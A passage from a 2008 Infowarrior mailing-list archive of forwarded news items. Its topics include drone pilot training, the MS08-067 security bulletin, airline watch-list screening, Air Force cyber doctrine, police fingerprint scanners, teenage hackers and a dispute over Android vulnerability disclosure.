And he set up a task force in April to find more innovative ways to get the aircraft to the battlefield more quickly. Predators are playing a crucial role on the battlefields in Iraq and Afghanistan, providing real-time surveillance video to troops on the ground, targeting and firing Hellfire anti-tank missiles at militants, and homing in on enemy efforts to plant roadside bombs. Earlier this year, for example, a Predator - probably one operated by the CIA - fired on a suspected terrorist safehouse in Pakistan's north Waziristan region, killing Abu Laith al-Libi, a key al-Qaida leader. To date, the Air Force has been using experienced fighter pilots to operate the drones. But as the demand has skyrocketed, the service has struggled to find enough pilots to fill both the manned and unmanned jobs. "The pipeline that produces manned operators is full," said Sheldon. "We're pushing them through there as fast as we can." The two new programs are just beginning. Two pilots have just been selected to go directly from training to the unmanned program. Once there they will get an additional four to six weeks of schooling on how to operate the drone, how the weapons systems work, and how to coordinate with troops on the ground. Eventually that will expand, sending as many as 100 a year through the drone program for the next three years. Meanwhile, the test program for non-pilots is aimed at Air Force captains who have four to six years of experience, but no flight training. Their schooling would take up to nine months, and they would not have to meet all of the more stringent standards that jet fighter pilots must. Unmanned pilots, for example, will not have to meet certain height or vision requirements, and also would not be eliminated due to physical conditions that might prevent them from flying at high altitudes. In pressing the Air Force to be more aggressive getting drones to the war, Gates hinted at such a plan, calling for "bold" thinking.
"All this may require rethinking long-standing service assumptions and priorities about which missions require certified pilots and which do not," Gates said in April. Under the fledgling program, the drone pilots would go to Pueblo, Colo., for about six weeks of flight training. Sheldon said they would learn to fly a small Mitsubishi single-engine propeller plane, probably do a solo flight and get a handle on basic aircraft controls. They would also train on flight simulators, and then go through the unmanned aircraft training. Officials quickly reject temptations to compare the drone pilots to video gamers who have a far easier job at their computer screens than pilots sitting in cockpits. An F-16 fighter jet, said Sheldon, is easy enough to fly from one spot to another. The harder part, he said, is deploying the weapons. The same is true for the drones. "It's not particularly difficult to fly a (drone) from point A to point B," said Sheldon. "It is challenging to fly it in a combat environment, coordinating with a guy on the ground who wants you to hit a target over here that's got (friendly) folks only 50 meters from it." Air Force captains have until Nov. 3 to apply for the new program. They will be screened and tested, and the first 10 will begin classes Jan. 5. A second class of 10 will begin in April. The test program will also get reviewed by the Federal Aviation Administration in the coming months. Officials could not provide any cost estimates for the new training programs. ___ On the Net: Defense Department: http://www.defenselink.mil From rforno at infowarrior.org Thu Oct 23 18:11:23 2008 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 23 Oct 2008 14:11:23 -0400 Subject: [Infowarrior] - Critical MS RPC Bulletin Message-ID: <682C37DD-7C7C-47EF-B0A7-16A07CF2A111@infowarrior.org> Microsoft Security Bulletin MS08-067 -
Critical Vulnerability in Server Service Could Allow Remote Code Execution (958644) Published: October 23, 2008 Version: 1.0 Executive Summary This security update resolves a privately reported vulnerability in the Server service. The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit. Firewall best practices and standard default firewall configurations can help protect network resources from attacks that originate outside the enterprise perimeter. This security update is rated Critical for all supported editions of Microsoft Windows 2000, Windows XP, Windows Server 2003, and rated Important for all supported editions of Windows Vista and Windows Server 2008. For more information, see the subsection, Affected and Non-Affected Software, in this section. The security update addresses the vulnerability by correcting the way that the Server service handles RPC requests. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information. Recommendation. Microsoft recommends that customers apply the update immediately. < - > http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx From rforno at infowarrior.org Fri Oct 24 01:57:46 2008 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 23 Oct 2008 21:57:46 -0400 Subject: [Infowarrior] - Feds to Take Over Airline Watch Lists in 2009 Message-ID: Feds to Take Over Airline Watch Lists in 2009 By Ryan Singel October 22, 2008 | 4:16:33 PM | Categories: Watchlists http://blog.wired.com/27bstroke6/2008/10/feds-to-take-ov.html U.S.
airline passengers will soon have to give their date of birth and gender when buying a plane ticket, as the government prepares to take over terrorist watch list screening starting in early 2009, Department of Homeland Security officials announced Wednesday. Under the so-called "Secure Flight" proposal -- which has been six years and numerous privacy scandals in the making -- airlines will submit travelers' personal information to DHS, which will compare the information against terrorist watch lists and then send the results to the airlines. Previously, airlines have performed the screening autonomously. The government hopes that a centralized checking system will reduce the number of false matches on the list, which have notoriously included senators, nuns and anyone named David Nelson. "Secure Flight is a critical tool that will further improve aviation security and fix the major customer service issue of watch list misidentifications, a frustratingly common occurrence for travelers under the existing airline-based system," said homeland security secretary Michael Chertoff in a press release. Privacy groups gave the program a lukewarm welcome, acknowledging they largely won a five-year battle to scale back the program's ambitions. "What remains to be seen is whether the revisions to Secure Flight will really work," said ACLU legislative counsel Tim Sparapani. "We suspect that although the government will do the vetting now, instead of the airlines, the failure to scrub the watch lists of hundreds of thousands of records of innocent, law-abiding passengers will result in still far too many mistakes and burdens for those travelers whose only crime is that their name is similar to somebody whom the government thinks is suspicious." The airline industry has long been wary of Secure Flight, due to the costs of changing their networks to interact with the government's and the complexity of clearing names with re-booked itineraries or last- minute purchases. 
Airlines will have to begin sending data to the government at least 72 hours before a flight departs. DHS estimates Secure Flight will cost passengers, the government and the airline industry more than $3 billion over 10 years. Secure Flight's task is not easy, as more than 2 million people fly domestically daily and the program is eventually supposed to take over watch list matching for all inbound and outbound international flights as well. Currently, each airline matches reservation names against lists provided to them by the Transportation Security Administration. The TSA blames airlines for not using good name-matching technology or doing enough to solve false matches against the list. Secure Flight is a far cry from earlier proposals known as CAPPS II, which sought to judge each passenger's potential terrorism potential by looking at government and private databases. Those systems were scrapped as being too complicated and invasive after the airlines and the TSA were caught secretly sharing passenger data. The TSA says it will only hang onto most people's travel records for a week. Records from travelers who look like they match one of the lists will be kept for seven years, and records that seem to be a real match against the list will be kept for 99 years. The TSA will begin testing the system in January 2009, at first in parallel with test airlines' current processes. Airlines and travel agents are expected to re-jigger their systems to collect the new personal information, as well as the passenger's Redress number and Known Traveler number, over the next nine months. Travelers who consistently find themselves unable to get a boarding pass without having a long conversation with airline employees can try to get help from DHS's TRIP program. Armed with an I'm-not-the-terrorist-you-are-looking-for number, passengers should be able to print boarding passes at home or at kiosks under Secure Flight.
DHS expects that in the future people who have been cleared of any terrorism ties by a government background check -- say a pilot or airline mechanic -- could use a Known Traveler number to escape the checks, but that doesn't exist currently. The long delayed program also needs to be cleared by Congress's investigative office, the Government Accountability Office, which has repeatedly found the program's privacy protections lacking. Although President Bush said in one of his controversial signing statements that Congress didn't have the right to condition funding for Secure Flight based on a GAO audit, DHS said Wednesday it will wait until the GAO signs off on Secure Flight before testing it. From rforno at infowarrior.org Fri Oct 24 11:32:52 2008 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 24 Oct 2008 07:32:52 -0400 Subject: [Infowarrior] - US judge to decide what is meant by 'enemy combatant' Message-ID: US judge to decide what is meant by 'enemy combatant' AFP Published: Thursday October 23, 2008 http://rawstory.com/news/afp/US_judge_to_decide_what_is_meant_by_10232008.html A federal judge held a hearing Thursday on the meaning of "enemy combatant," which the US government uses to justify holding suspects indefinitely without charge, as six Guantanamo prisoners were readied for trial. Government and defense lawyers squared off on whether an enemy combatant is someone who participates in or supports terrorism, a crucial question since the six suspects were arrested in Bosnia for alleged links to the Al-Qaeda terror network. One of the detainees allegedly spoke with an Al-Qaeda member by telephone, a charge his lawyers claim has not been substantiated with evidence, while the rest allegedly made plans to travel to Afghanistan in late 2001, after the September 11 attacks.
The six suspects have been held at the US naval base at Guantanamo Bay, Cuba, some for almost seven years, without any legal recourse until the US Supreme Court in June ruled that they have the right to challenge their detention in civilian court. Their trials are due to start in November. At the start of the hearing, US District Judge Richard Leon wondered how the Supreme Court arrived at its June ruling without providing a definition for enemy combatant in the first place. Attorney Mark Fleming, who is defending Algerian Lakhdar Boumediene, argued that international law establishes the "relevant standard" for enemy combatant, as somebody who takes "direct participation" in hostilities. He said the United States started "extending the definition" after the September 11, 2001 attacks. Government lawyers responded by saying the term applied to anybody planning to join the combat, and stressed the United States was fighting enemies who did not respect the laws of war. "The petitioners say we captured them too soon," before they could actually engage the United States in battle, the government lawyer added. The judge is expected to issue his definition of enemy combatant on Monday, although he cautioned it still may not resolve the issue, since the term appeared broad in scope. From rforno at infowarrior.org Fri Oct 24 11:39:47 2008 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 24 Oct 2008 07:39:47 -0400 Subject: [Infowarrior] - Book: The Atlas of Cyberspace Message-ID: <9B30EE77-C941-4DEF-A38A-5290DE11E913@infowarrior.org> (via MRunner) http://www.kitchin.org/atlas/index.html The Atlas of Cyberspace, by Martin Dodge and Rob Kitchin, is the first comprehensive book to explore the spatial and visual nature of cyberspace and its infrastructure. It uses a user-friendly, approachable style to examine why cyberspace is being mapped and what new cartographic and visualisation techniques have been employed. 
Richly illustrated with over 300 full colour images, it comprehensively catalogues 30 years worth of maps that reveal the rich and varied landscapes of cyberspace. The book includes chapters detailing: - mapping Internet infrastructure and traffic flows - mapping the Web - mapping online conversation and community - imagining cyberspace in art, literature, and film Note: Full book is available as free PDF via CCC license: http://www.kitchin.org/atlas/contents.html From rforno at infowarrior.org Sat Oct 25 02:32:29 2008 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 24 Oct 2008 22:32:29 -0400 Subject: [Infowarrior] - AF Wants 'Freedom to Attack' Online Message-ID: <90F08645-DD47-4BB3-869F-2F7118E37F6D@infowarrior.org> Air Force Wants 'Freedom to Attack' Online By Noah Shachtman October 24, 2008 | 12:43:00 PM | Categories: Info War http://blog.wired.com/defense/2008/10/in-new-doctrine.html Gone are the days when the Air Force pledged to "dominate" cyberspace. Now, the flyboys just want "freedom of action" online. Oh, and the ability to deceive foes, and cyberstrike enemies at will. That's according to a draft document, "Cyberspace Operations -- Air Force Doctrine Document 2-11," obtained by Inside Defense. "Freedom of action... can be seen as freedom from attack and freedom to attack," the paper states. But, it adds, "The size and complexity of the domain and the extensive collection of networks... can make freedom of action difficult and perhaps elusive." For years, the Air Force has been trying to ramp up its network war plans. But the service has had trouble deciding exactly what it wants those cyber battle plans to be. In 2005, the Air Force changed its mission statement to read, "As Airmen, it is our calling to dominate Air, Space, and Cyberspace." Then the service announced a far-reaching effort to set up a "Cyber Command," responsible for that dominance.
But by August of this year, that project was put on hold, after it became painfully obvious that no one was really sure what the new command would really do (or even how to define the term "cyber.") Now, those network warriors will fall under the purview of Air Force Space Command. According to Inside Defense, the Air Force's new, 70-page document uses an awfully broad definition of what could be considered cyber, "touching on everything from bombs against enemy network nodes to radar-jamming aircraft, computer firewalls and fake e-mails to terrorist operatives." Even "rapid software development" and "psychological operations" are counted as components of information warfare. Such operations could include "spoofing" enemy command and control systems to "deceive the adversary about friendly intentions." Airmen also could jam crucial enemy equipment under the guise of seemingly unrelated, natural events. "Using our knowledge of space and terrestrial weather, we can mask our spoofing with ostensible natural conditions such as lightning strikes," the document reads... If airmen know the terrorist receives instructions through the Internet, they could "destroy, disrupt and/or exploit" the Internet link. If the terrorist's e-mail address is known, officials could "send him an e-mail message to influence his behavior." Finally, if airmen know the format in which the instructions are presented, they could "send him false taskings that look authentic," the document reads. Sounds like a plan. From rforno at infowarrior.org Sat Oct 25 02:34:06 2008 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 24 Oct 2008 22:34:06 -0400 Subject: [Infowarrior] - Center for Internet Freedom Message-ID: <9DA0FB67-5979-40A1-B1E1-7E6C2CECDDDC@infowarrior.org> Center for Internet Freedom http://www.pff.org/cif/ About the Center The mission of the Center for Internet Freedom is to advance a comprehensive market-oriented approach to Internet policy issues.
Our approach minimizes government control and regulation while maximizing the freedom of the online sector to innovate, invest and grow. By offering timely analyses and critiques of Internet policy that diminish the vital role of free markets, free speech and property rights, the Center seeks to drive the Internet policy debate in new directions and counter the proliferations of advocacy groups calling for government intervention. The Center's work will include such issues as online advertising, privacy, online speech, intermediary liability, and issues affecting e- commerce, such as taxation. From rforno at infowarrior.org Sun Oct 26 20:29:37 2008 From: rforno at infowarrior.org (Richard Forno) Date: Sun, 26 Oct 2008 16:29:37 -0400 Subject: [Infowarrior] - Google Policy Fellowship Message-ID: <50369E37-FC64-4239-9BC6-EC819D0F178E@infowarrior.org> http://www.google.com/policyfellowship/ Introducing the Google Policy Fellowship As lawmakers around the world become more engaged on Internet policy, ensuring a robust and intelligent public debate around these issues becomes increasingly important. That?s why we're announcing our second summer for the Google Policy Fellowship Program?to support students and organizations working on policy issues fundamental to the future of the Internet and its users. Program Overview Fellows will have the opportunity to work at public interest organizations at the forefront of debates on broadband and access policy, content regulation, copyright and trademark reform, consumer privacy, open government, and more. 
Participating organizations are based in either Washington, DC, San Francisco, CA , Ottawa or Toronto, Canada and include: American Library Association, Cato Institute, Canadian Internet Policy and Public Interest Clinic, Center for Democracy and Technology, Citizen Lab, Competitive Enterprise Institute, Creative Commons, Electronic Frontier Foundation, Future of Music Coalition, Internet Education Foundation, Media Access Project, New America Foundation, Progress and Freedom Foundation, Public Knowledge, and Technology Policy Institute. More information about the host organizations and the areas of focus for the fellows are outlined here. Fellows will be assigned a lead mentor at their host organizations, but will have the opportunity to work with several senior staff members over the course of the summer. Fellows will be expected to make substantive contributions to the work of their organization, including conducting policy research and analysis; drafting reports and analyses; attending government and industry meetings and conferences; and participating in other advocacy activities. From rforno at infowarrior.org Mon Oct 27 12:45:42 2008 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 27 Oct 2008 08:45:42 -0400 Subject: [Infowarrior] - UK cops w/mobile fingerprint scanners Message-ID: <88824933-BFA9-42E2-B1E0-722597483A03@infowarrior.org> Police will use new device to take fingerprints in street Civil rights campaigners say images must not be added to databases http://www.guardian.co.uk/politics/2008/oct/27/project-midas-fingerprint-scanner-liberty Every police force in the UK is to be equipped with mobile fingerprint scanners - handheld devices that allow police to carry out identity checks on people in the street. The new technology, which ultimately may be able to receive pictures of suspects, is likely to be in widespread use within 18 months. Tens of thousands of sets - as compact as BlackBerry smartphones - are expected to be distributed. 
The police claim the scheme, called Project Midas, will transform the speed of criminal investigations. A similar, heavier machine has been tested during limited trials with motorway patrols. To address fears about mass surveillance and random searches, the police insist fingerprints taken by the scanners will not be stored or added to databases.

Liberty, the civil rights group, cautioned that the law required fingerprints taken in such circumstances to be deleted after use. Gareth Crossman, Liberty's policy director, said: "Saving time with new technology could help police performance but officers must make absolutely certain that they take fingerprints only when they suspect an individual of an offence and can't establish his identity."

Details of the type of equipment and the scope of its use have been revealed in a presentation by the National Policing Improvement Agency (NPIA). The initial phase of the Mobile Identification At Scene (Midas) project, costed at £30m-£40m, will enable officers to perform rapid checks on the fingerprints of people arrested or detained. The marks will be compared against records on Ident1, the national police database which holds information on 7.5 million individuals.

Geoff Whitaker, a senior technology officer with the NPIA, told the Biometrics 2008 conference that Project Midas would save enormous amounts of police time and reduce the number of wrongful arrests. At present, officers have to take suspects to custody suites if they need to check fingerprints. On average, the agency's research shows, the procedure takes 67 minutes.

"If we scaled this [saving] up to the national level that would equate to 366 additional police officers on the beat," Whitaker said. "One of the benefits is that it will reduce the number of errors - and we can reduce the number of arrests significantly.

"There's a huge range of opportunities [for] mobile ID.
It could be used on the deceased at the scene of a crime, on suspects for intelligence in the early part of an investigation, [or even] in a mortuary."

Policing of big public occasions, sporting events, festivals, political conferences - as well as immigration and border controls - could benefit from the equipment, he suggested. "Another use is for prisoners in transit; it's not uncommon for prisoners to swap identities on the way to prison," he said. Project Midas, he said, would give the police "a full, mobile national capability" to check identities.

The system is being designed to have the capacity to beam images of suspects back to officers on the streets to help confirm identifications. Some US police forces are already using the technology. "The return of mugshots [to officers]," Whitaker added, "is something we would like to do." The tender document for Midas states: "Bidders' solutions ... should include, but may not be limited to, fingerprint identification capability." Plans for a police Facial Images National Database (Find) were suspended last year but are being reviewed. One of the companies bidding for the Midas contract, Northrop Grumman, told the Guardian: "A lot of the hand-held [devices] we are considering have cameras so they can support fingerprint and facial images".

A limited trial of mobile police fingerprint devices, called Project Lantern, started in 2006. About 200 have been distributed and 30,000 checks performed. They were deployed in police cars using automatic number plate recognition technology - stopping vehicles that were logged as stolen, having no insurance, no MOT or simply unknown. "The aim was to deny criminals the use of the roads," said Whitaker. "Around 60% of drivers stopped gave false identification details." Fingerprint checks often showed they were carrying falsified documents.
The electronic searches, encrypted and sent over public networks, were usually returned to the mobile devices within two minutes; 97% of searches were completed in five minutes. Responses are graded as "high" or "medium". If high, it shows the system is confident of a match; if medium, it could display up to three potential identities. The returned data includes the name, age and gender of the suspect if there is a match.

A spokeswoman for the NPIA added: "It will be up to each police authority to assess the benefits and see how many they want. Early indications are that the benefits will be huge."

Thomas Smith, an officer from the Los Angeles police department, also briefed the Biometrics 2008 conference on the success of his force's mobile ID devices which send images and fingerprint matches back to officers on the street. He said they had become so powerful that once the machines were produced some suspects admitted they were lying about their identity. "Our next thing will be facial recognition [computerised matching of suspects from their faces] in the field," he said.

From rforno at infowarrior.org Mon Oct 27 18:20:22 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Mon, 27 Oct 2008 14:20:22 -0400
Subject: [Infowarrior] - Alarm raised on teenage hackers
Message-ID: <1AB00F57-EB15-4A44-8FAD-428A238A23AC@infowarrior.org>

(Must be a slow news day......-rf)

Alarm raised on teenage hackers
By Mark Ward
Technology correspondent, BBC News
http://newsvote.bbc.co.uk/mpapps/pagetools/print/news.bbc.co.uk/2/hi/technology/7690126.stm

Increasing numbers of teenagers are starting to dabble in hi-tech crime, say experts. Computer security professionals say many net forums are populated by teenagers swapping credit card numbers, phishing kits and hacking tips. The poor technical skills of many young hackers means they are very likely to get caught and arrested, they say.
Youth workers added that any teenager getting a criminal record would be putting their future at risk.

Slippery slope

"I see kids of 11 and 12 sharing credit card details and asking for hacks," said Chris Boyd, director of malware research at FaceTime Security. Many teenagers got into low level crime by looking for exploits and cracks for their favourite computer games. Communities and forums spring up where people start to swap malicious programs, knowledge and sometimes stolen data. Some also look for exploits and virus code that can be run against the social networking sites popular with many young people. Some then try to peddle or use the details or accounts they net in this way.

Mr Boyd said he spent a lot of time tracking down the creators of many of the nuisance programs written to exploit users of social networking sites and the culprit was often a teenager. From such virus and nuisance programs, he said, many progress to outright criminal practices such as using phishing kits to create and run their own scams. "Some are quite crude, some are clever and some are stupid," he said.

The teenagers' attempts to make money from their life of cyber crime usually came unstuck because of their poor technical skills. "They do not even know enough to get a simple phishing or attack tool right," said Kevin Hogan, a senior manager at Symantec Security Response. "We have seen phishing sites that have broken images because the link, rather than reference the original webpage, is referencing a file on the C: drive that is not there," he said. Symantec researchers have collected many examples of teenagers who have managed to cripple their own PCs by infecting them with viruses they have written.

Video choice

Chris Boyd from FaceTime said many of the young criminal hackers were undermined by their desire to win recognition for their exploits. "They are obsessed with making videos of what they are doing," he said.
Many post videos of what they have done to sites such as YouTube and sign on with the same alias used to hack a site, run a phishing attack or write a web exploit. Many share photos or other details of their life on other sites making it easy for computer security experts to track them down and get them shut down. Mr Boyd's action to shut down one wannabe hacker, using the name YoGangsta50, was so comprehensive that it wrung a pledge from the teenager in question never to get involved in petty hi-tech crime again.

Mathew Bevan, a reformed hacker who was arrested as a teenager and then acquitted for his online exploits, said it was no surprise that young people were indulging in online crime. "It's about the thrill and power to prove they are somebody," he said. That also explains why they stuck with an alias or online identity even though it was compromised, he added. "The aim of what they are doing is to get the fame within their peer group," he said. "They spend months or years developing who they are and their status. They do not want to give that up freely."

Graham Robb, a board member of the Youth Justice Board, said teenagers needed to appreciate the risks they took by falling into hi-tech crime. "If they get a criminal record it stays with them," he said. "A Criminal Record Bureau check will throw that up and it could prevent access to jobs." Anyone arrested and charged for the most serious crimes would carry their criminal record with them throughout their life. Also, he added, young people needed to appreciate the impact of actions carried out via the net and a computer. "Are they going to be able to live with the fact that they caused harm to other people?" he said. "They do not think there is someone losing their money or their savings from what they are doing.

"For a kid, getting a criminal record is the worst possible move."

Story from BBC NEWS: http://news.bbc.co.uk/go/pr/fr/-/2/hi/technology/7690126.stm
Published: 2008/10/27 10:26:19 GMT ©
BBC MMVIII

From rforno at infowarrior.org Mon Oct 27 18:21:33 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Mon, 27 Oct 2008 14:21:33 -0400
Subject: [Infowarrior] - Debunking Google's vuln disclosure propaganda
Message-ID:

Debunking Google's security vulnerability disclosure propaganda
Posted by Chris Soghoian
http://news.cnet.com/8301-13739_3-10075488-46.html?part=rss&subj=news&tag=2547-1_3-0-20

Question: You're a multi-billion dollar tech giant, you've launched a new phone platform after much media fanfare. Then, a security researcher finds a flaw in your product within days of its release. Worse, the vulnerability is due to the fact that you shipped old (and known to be flawed) software on the phones. What should you do? Issue an emergency update, warn users, or perhaps even issue a recall? If you're Google, the answer is simple -- attack the researcher.

With the news of a flaw in Google's Android phone platform making the New York Times on Friday, the search-giant quickly ramped up the spin machine. After first dismissing the amount of damage to which the flaw exposed users, anonymous Google executives then attempted to discredit the security researcher, Charlie Miller, a former NSA employee turned security consultant. Miller, the unnamed Googlers argued, acted irresponsibly by going to the New York Times to announce his vulnerability, instead of giving the Big G a few weeks or months to fix the flaw:

Google executives said they believed that Mr. Miller had violated an unwritten code between companies and researchers that is intended to give companies time to fix problems before they are publicized.

What the Googlers are talking about is the idea of "responsible disclosure," one method of disclosing security vulnerabilities in software products.
While it is an approach that is frequently followed by researchers, it is not the only method available, and in spite of the wishes of the companies whose products are frequently analyzed, it is by no means the "norm" for the industry.

Another frequently used method is that of "full disclosure" -- in which a researcher will post complete details of a vulnerability to a public forum (typically a mailing list dedicated to security topics). This approach is often used by researchers when they have discovered a flaw in a product made by a company with a poor track record of working with researchers -- or worse, threatening to sue them. For example, some researchers refuse to provide Apple with any advanced notification, due to its past behavior.

A third method involves selling information on the vulnerabilities to third parties (such as Tippingpoint and iDefense) -- who pass that information on to their own customers, or perhaps keep it for themselves. Charlie Miller, the man who discovered the Android flaw, has followed this path in the past, most notably when he sold details of a flaw in the Linux Kernel to the US National Security Agency for $50,000 (pdf).

Google's poor track record

First, consider the fact that security is a two-sided coin. If Google wants researchers to come to it first with vulnerability information, it is only fair to expect that Google be forthcoming with the community (and the general public) once the flaw has been fixed. Google's approach in this area is that of total secrecy -- not acknowledging flaws, and certainly not notifying users that a vulnerability existed or has been fixed. Google's CIO admitted as much in a 2007 interview with the Wall Street Journal:

Regarding security-flaw disclosure, Mr. Merrill says Google hasn't provided much because consumers, its primary users to date, often aren't tech-savvy enough to understand security bulletins and find them "distracting and confusing."
Also, because fixes Google makes on its servers are invisible to the user, notification hasn't seemed necessary, he says.

Second, companies do not have a right to expect "responsible disclosure." It is a mutual compromise, where the researchers provide the company with advanced notification in exchange for some form of assurance that the company will act reasonably, keep the lines of communication open, and give the researcher full credit once the vulnerability is fixed. Google's track record in this area leaves much to be desired. Many top tier researchers have not been credited for disclosing flaws, and in some cases, Google has repeatedly dragged its feet in fixing flaws. The end result is that many frustrated researchers have opted to follow the full disclosure path, after hitting a brick wall when trying to provide Google with advanced notice.

I can personally confirm this experience, after I discovered a fairly significant flaw in a number of commercial Firefox toolbars back in 2007. While Mozilla and Yahoo replied to my initial email within a day or so, and kept the lines of communication open, Google repeatedly stonewalled me, and I didn't hear anything from them for weeks at a time. Eventually, Google fixed the flaw a day or two after I went public with the vulnerability, 45 days after I had originally given the company private notice. As a result, I have extreme sympathy for those in the research community who have written Google off.

A rather unimpressive vulnerability

Once we actually look into the details of the vulnerability, and Miller's disclosure, the situation looks even worse for Google.

A known vulnerability: The Android platform is built on top of over 80 open source libraries and programs. This particular flaw had been known about for some time and already fixed in the current version of the open source libraries. The flaw in Google's product only exists because the company shipped out-of-date software, which was known to be vulnerable.
Advanced notice: While the anonymous Google executives criticized Miller for not following responsible disclosure practices, it is worth noting that the researcher did provide Google with early notice -- informing the company on the 20th of October. It is also important to note that Miller and his colleagues have yet to actually provide full information on the vulnerability or a working proof of concept exploit to the security community. Thus, it can hardly be said that Miller followed the full disclosure path.

If Google can criticize Miller at all, it cannot be for not warning the company, but perhaps for not providing them with enough warning. However, given that Google shipped known-vulnerable software to hundreds of thousands of users, and that fixed versions of the vulnerable software packages have been available for some time, it is difficult for this blogger to sympathize with the poor folks at Mountain View.

Furthermore, given Mr. Miller's previous mercenaryish history of selling software vulnerabilities to the National Security Agency (which presumably used the flaws to break into foreign government computers, and not in order to fix the vulnerable software), we should be happy that he is at least now sharing the existence of this flaw with the public. At least this way, developers have a good chance of finding and fixing it.

Disclosure: In the summer of 2006, I worked as an intern for the Application Security Team at Google. Furthermore between 2003-2005, I was a student at Johns Hopkins University, and advised by Prof. Avi Rubin, who is one of the founders of Independent Security Evaluators, the company that employs Charlie Miller. A couple of my former colleagues also now work for ISE. I have not spoken with them (or anyone at Google) about this article.

Christopher Soghoian delves into the areas of security, privacy, technology policy and cyber-law.
He is a student fellow at Harvard University's Berkman Center for Internet and Society, and is a PhD candidate at Indiana University's School of Informatics. His academic work and contact information can be found by visiting www.dubfire.net/chris/. He is a member of the CNET Blog Network, and is not an employee of CNET.

From rforno at infowarrior.org Tue Oct 28 02:53:19 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Mon, 27 Oct 2008 22:53:19 -0400
Subject: [Infowarrior] - German police seek speeding British Muppet
Message-ID: <90051487-8EBE-4CD1-976A-1FB7CFAA23B5@infowarrior.org>

(pics @ the link, too)

German police seek speeding British Muppet
http://arbroath.blogspot.com/2008/10/german-police-seek-speeding-british.html

German traffic police have been left looking like proper muppets by a British prankster. An Audi TT with British registration plates has been repeatedly caught speeding on roads in the Bavarian city of Bayreuth. But because continental speed cameras are set up for left-hand drive vehicles, the cameras keep missing the driver's face. Instead, they keep capturing clear views of a manic Muppet-like toy which the cheeky Brit has propped up on his passenger seat.

But police admit they are even baffled about the identity of the muppet. The No.1 suspect is Animal - the manic drummer from The Muppet Show's house band The Electric Mayhem. But several residents of Sesame Street are also in the frame, including the lovable monster Grover and Bert's rubber-ducky-loving sidekick Ernie. Now police have released one of the photographs in the hope someone will recognise the furry speed demon.

A German police source said: "The number plate is not enough. We need clear evidence of who is driving the vehicle too.

"But because this is a British vehicle we can never get a decent picture. The driver has obviously worked this out because he has placed a large puppet in the passenger seat.
"This may be an example of the famous British sense of humour but it is still dangerous driving. The driver has been caught on camera on several occasions and the puppet is on the passenger seat every time. We suspect he positions the toy deliberately before accelerating past the camera."

From rforno at infowarrior.org Tue Oct 28 06:15:43 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Tue, 28 Oct 2008 02:15:43 -0400
Subject: [Infowarrior] - Vendor FAIL - Certified Pre-Owned (CPO)
Message-ID: <28D57FAB-279F-4264-81CF-C4263797EB73@infowarrior.org>

http://attrition.org/errata/cpo/

Vendor FAIL - Certified Pre-Owned (CPO)
How vendors screw up their own products and leave YOU holding the virtual bag

Certified Pre-0wned

For reasons unknown, vendors occasionally fail to maintain quality control over the media they ship. Whether it is CD-ROM, DVD, USB or some other form of media, it may contain viruses, trojans or even drug-runner music. When this happens, the software you receive obviously can't be trusted in any fashion, and installing software from already compromised media immediately puts your system's integrity in question. This page serves to keep a record of such incidents and remind vendors that shipping "pre-0wned" software is deplorable.

This list is designed to capture consumer related exposures, specifically malware or other items of interest. This list will not include incidents of vendors shipping vulnerable software as that list would be extensive. In addition, it will not track targeted malware attacks against specific targets, such as the "Farewell Dossier". For an interesting historical perspective of such incidents until 1996, consult McDonald's list. Some of these incidents are integrated in the CPO list depending on the information available.

[..]

This list is not complete, yet it should make you realize that nothing is safe. Every piece of electronics you buy and every piece of software you install may come with malware pre-installed.
Rather than manufacturers introducing a higher set of quality controls to prevent such incidents, we will no doubt see companies produce new products that will help keep you "safe" from such threats. These "controls" would no doubt be another bandaid on top of bandaids that make up a lucrative market, which is sad commentary about how customers perceive and receive "electronic security".

http://attrition.org/errata/cpo/

From rforno at infowarrior.org Tue Oct 28 15:47:29 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Tue, 28 Oct 2008 11:47:29 -0400
Subject: [Infowarrior] - Citizen Journalists Protecting the 2008 Election
Message-ID:

Citizen Journalists Protecting the 2008 Election
Source: New York Times, October 27, 2008

The New York Times notes, "There are at least two wikis intended to let voters collaborate to collect examples of problems with voting, whether exceptionally long lines or more direct actions meant to scare off voters -- the Voter Suppression Wiki and SourceWatch's Election Protection Wiki. Since 2006, the Video the Vote project has sent out volunteers to monitor voting around the country, and this year the group expects to dispatch at least 2,300 volunteers with cameras in all 50 states to videotape potential trouble spots. ... The ultimate home for much of this content could be the video-sharing giant YouTube, which has created a channel, Video Your Vote, in collaboration with PBS, to encourage submissions. ... While his organization is partnering with YouTube (and received 300 cameras as part of the Video Your Vote project), [project founder Ian] Inaba says he sees their missions as different. 'YouTube is there to generate content, to generate eyeballs,' he said. 'We came at this from more of an election protection framework.
We want voters to oversee the election process - it requires citizen oversight.'"

http://www.prwatch.org/node/7869

From rforno at infowarrior.org Tue Oct 28 15:50:44 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Tue, 28 Oct 2008 11:50:44 -0400
Subject: [Infowarrior] - Student charged after alerting principal to server hack
Message-ID: <00B3F43F-2F74-4E0C-A7DA-19E67159D4E9@infowarrior.org>

Student charged after alerting principal to server hack
'Intentional criminal act'?
By Dan Goodin in San Francisco
Posted in Crime, 28th October 2008 00:38 GMT
http://www.theregister.co.uk/2008/10/28/student_charged/

A 15-year-old high school student in New York State has been charged with three felonies after he allegedly accessed personnel records on his school's poorly configured computer network and then notified his principal of the security weakness.

The unnamed student of Shenendehowa Central School was charged Thursday with computer trespass, unlawful possession of personal identification information and identity theft, according to news reports. He has been suspended from school and ordered to stand charges in family court in Saratoga County.

